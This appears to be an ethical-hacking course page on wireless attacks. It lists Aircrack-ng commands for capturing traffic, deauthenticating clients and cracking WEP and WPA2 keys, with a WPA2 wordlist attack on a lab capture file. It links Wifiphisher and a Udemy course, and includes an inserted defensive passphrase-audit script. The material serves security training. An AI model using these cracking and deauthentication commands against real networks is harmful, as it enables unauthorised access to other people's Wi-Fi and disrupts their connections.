# 3. Perform Wireless Attacks

{% embed url="<https://rumble.com/embed/v6nqikc/?pub=4jw86f>" %}

## <mark style="color:red;">1. Crack WEP using Aircrack-ng</mark>

```
airmon-ng start wlan0
airodump-ng
airodump-ng -w "filename" -c "channel name"
aireplay-ng -1 0 -a (bssid) -h (mac of your card) -e (essid) (interface)
aireplay-ng -3 -b "bssid" -h "mac address"
aireplay-ng --deauth 3 -a MAC_AP -c MAC_Client mon0
aircrack-ng -b "bssid" "filename.cap"
```

## <mark style="color:red;">2. Crack WEP using WifiPhisher</mark>

{% embed url="<https://github.com/wifiphisher/wifiphisher>" %}

## <mark style="color:red;">3. Crack WPA with FERN cracker</mark>

## 4. Crack WPA2 with Aircrack

WPA2 is an upgrade to WPA; it includes mandatory support for Counter Mode with Cipher Block Chaining Message Authentication Code Protocol (CCMP), an AES-based encryption protocol with strong security. WPA2 has two modes of operation: WPA2-Personal and WPA2-Enterprise. Despite being stronger than both WEP and WPA, the WPA2 encryption method can also be cracked using various techniques and tools.

In this task, we will use the Aircrack-ng suite to crack a WPA2 network.

```
aircrack-ng -a2 -b [Target BSSID] -w /home/attacker/Desktop/Wordlist/password.txt '/home/attacker/Desktop/Sample Captures/WPA2crack-01.cap'
```

* **-a** forces the attack mode; **2** selects WPA/WPA2-PSK.
* **-b** refers to bssid; replace with the BSSID of the target router.
* **-w** stands for wordlist; provide the path to a wordlist.

<figure><img src="/files/QdnrOK0mrBwUfaq644Xh" alt=""><figcaption></figcaption></figure>

The result appears, showing the WPA handshake packet captured with airodump-ng. The target access point’s password is cracked and displayed in plain text next to the message **KEY FOUND!**, as shown in the screenshot.

<figure><img src="/files/Y9E5FqCZ3NflVROItLcE" alt=""><figcaption></figcaption></figure>

{% embed url="<https://hackingplayground.blogspot.com/2022/07/hacking-wifi-networks-with-aircrack.html>" %}
Full tutorial
{% endembed %}

You can also use other tools such as **hashcat** (<https://hashcat.net>), **Portable Penetrator** (<https://www.secpoint.com>), **WepCrackGui** (<https://sourceforge.net>) to crack WEP/WPA/WPA2 encryption.
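A defender-side check for the dictionary attack described in this section, added here as an example (not part of the original page or of Aircrack-ng): it tests a candidate WPA2-Personal passphrase against the same kind of wordlist before the passphrase is deployed. The function names and the sample wordlist are constructed for illustration.

```python
import re
import string

# Constructed sample standing in for the wordlist file passed to -w.
SAMPLE_WORDLIST = """\
password
12345678
qwertyuiop
letmein123
sunshine
"""

# Printable ASCII (space through tilde); control whitespace is excluded.
_PRINTABLE = set(string.printable) - set("\t\n\r\x0b\x0c")


def load_wordlist(text):
    """Return the set of non-empty entries, lower-cased for comparison."""
    return {line.strip().lower() for line in text.splitlines() if line.strip()}


def audit_psk(passphrase, wordlist):
    """Return the reasons a passphrase would not survive a wordlist run."""
    findings = []
    # WPA2-Personal passphrases are 8 to 63 printable ASCII characters.
    if not 8 <= len(passphrase) <= 63:
        findings.append("length outside 8-63 characters")
    if any(ch not in _PRINTABLE for ch in passphrase):
        findings.append("contains non-printable or non-ASCII characters")
    lowered = passphrase.lower()
    if lowered in wordlist:
        findings.append("listed in wordlist")
    else:
        # Common mangling: a dictionary word plus trailing digits or symbols.
        stem = re.sub(r"[\d\W_]+$", "", lowered)
        if stem != lowered and stem in wordlist:
            findings.append("wordlist entry with trailing digits/symbols: " + stem)
    return findings


if __name__ == "__main__":
    words = load_wordlist(SAMPLE_WORDLIST)
    for candidate in ("Password", "sunshine2024!", "correct horse battery staple 91"):
        print(candidate, "->", audit_psk(candidate, words) or "no findings")
```

An empty result only means the passphrase is absent from this particular wordlist; length and randomness still decide how long it would resist a larger one.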

## <mark style="color:red;">5. Create a Rogue Access Point</mark>

{% embed url="<https://www.udemy.com/course/ethical-hacker-practical/?referralCode=289CF01CF51246BCAD6C>" %}


